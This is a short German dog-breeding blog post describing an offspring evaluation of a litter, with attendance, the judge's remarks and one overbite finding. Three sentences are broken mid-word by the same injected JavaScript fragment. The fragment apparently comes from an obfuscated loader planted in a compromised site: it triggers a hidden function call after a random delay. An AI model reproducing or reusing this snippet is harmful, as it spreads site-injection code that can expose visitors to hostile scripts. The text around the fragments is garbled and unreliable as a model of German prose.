Nachzuchtbeurteilung

Am 18. September war es soweit: der A-Wurf vom Eibenbogen traf sich fast komplett in Langensteinbach zur Nachzuchtbeurteilung. Leider war Lola (Asya) erkrankt, so dass Rene und Marijke kurzfristig absagen mussten. Allen andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen ein herzliches Dankeschön – es ist toll zu sehen, dass Ihr den teilweise wirklich weiten Weg auf Euch genommen habt, um dabei zu sein!
Die Veranstaltung war mit 5 zu beurteilenden Würfen gut besucht, trotzdem nahm sich Helge Ludwig viel Zeit für die einzelnen Hunde und hat den Teams auch den einen oder andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen guten Rat mit auf den Weg gegeben.
Bei der NZB wird der Hund hinsichtlich Erscheinung und Verhalten beurteilt, wie z.B. Fell, Gebiss, Gangwerk, Spiel- und Beutetrieb, sowie die Reaktion auf akustische und optische Einflüsse.
Bei einer Hündin wurde ein Vorbiss festgestellt, alle andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen haben keine zuchtausschließenden Fehler.

Hier nun die versprochenen Bilder: